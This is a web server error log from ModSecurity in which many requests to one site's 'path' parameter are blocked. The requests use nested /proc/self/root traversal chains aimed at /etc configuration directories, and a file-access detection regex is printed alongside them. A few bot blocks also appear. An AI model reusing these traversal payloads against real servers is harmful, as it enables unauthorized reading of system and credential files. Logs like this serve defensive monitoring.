[Wed Mar 18 13:06:01.099073 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:33550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNada6ubjKNq_cu4a2MgAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:06:14.339152 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.241.31:55566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNdimAPhZkrhU8w4mGKQAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:06:16.803540 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:35394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNeCmAPhZkrhU8w4mGLAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:07:15.771296 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:59750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNsymAPhZkrhU8w4mGaAAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:07:26.400118 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:57226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNvtY0UrI5A3LftIzMzwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:07:34.058493 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:51776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNxuw_le52K8_3pV33SAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:07:34.467676 2026] [:error] [pid 14940:tid 140411607643904] [client 74.7.241.31:39518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNxg9q-icfvEC7JQ_C8AAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:07:38.523146 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:57132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNyimAPhZkrhU8w4mGfQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:07:53.410564 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:39520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrN2ew_le52K8_3pV33YwAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:08:22.541800 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:57424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrN9vu8EFLIOrSqIpsb-AAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 13:08:33.934969 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:56076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrOAeoXxyEfFpUF8f-GPQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:08:34.031148 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:59412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrOAimAPhZkrhU8w4mGkwAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:09:04.867711 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.228.61:49092] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrOIMdf6f5d65gmYZTtrQAAAtQ"]
[Wed Mar 18 13:09:08.579336 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.244.43:44516] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrOJAkwaGbbGflqUZAptgAAAMI"]
[Wed Mar 18 13:09:40.390142 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:39418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrORNa6ubjKNq_cu4a2wgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:10:11.999255 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:55972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrOY-oXxyEfFpUF8f-GiwAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:10:37.707331 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:51100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrOfeyqAr6etmhZHNrfdAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:10:41.838347 2026] [:error] [pid 14940:tid 140411658000128] [client 74.7.243.128:53062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrOgQ9q-icfvEC7JQ_DRwAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:10:58.776409 2026] [:error] [pid 15411:tid 140411565680384] [client 74.7.243.128:60344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrOkTxp98MmCrbinZUcQgAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:11:00.092442 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:51612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrOlMdf6f5d65gmYZTt2AAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:11:10.692940 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:51618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrOnta6ubjKNq_cu4a24QAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:11:12.198987 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.241.31:55262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrOoEzinOy1jxa1j4cvnwAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:12:03.841002 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.243.128:44564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrO0wbLMZ6AikZjR9XZegAAAAY"], referer: 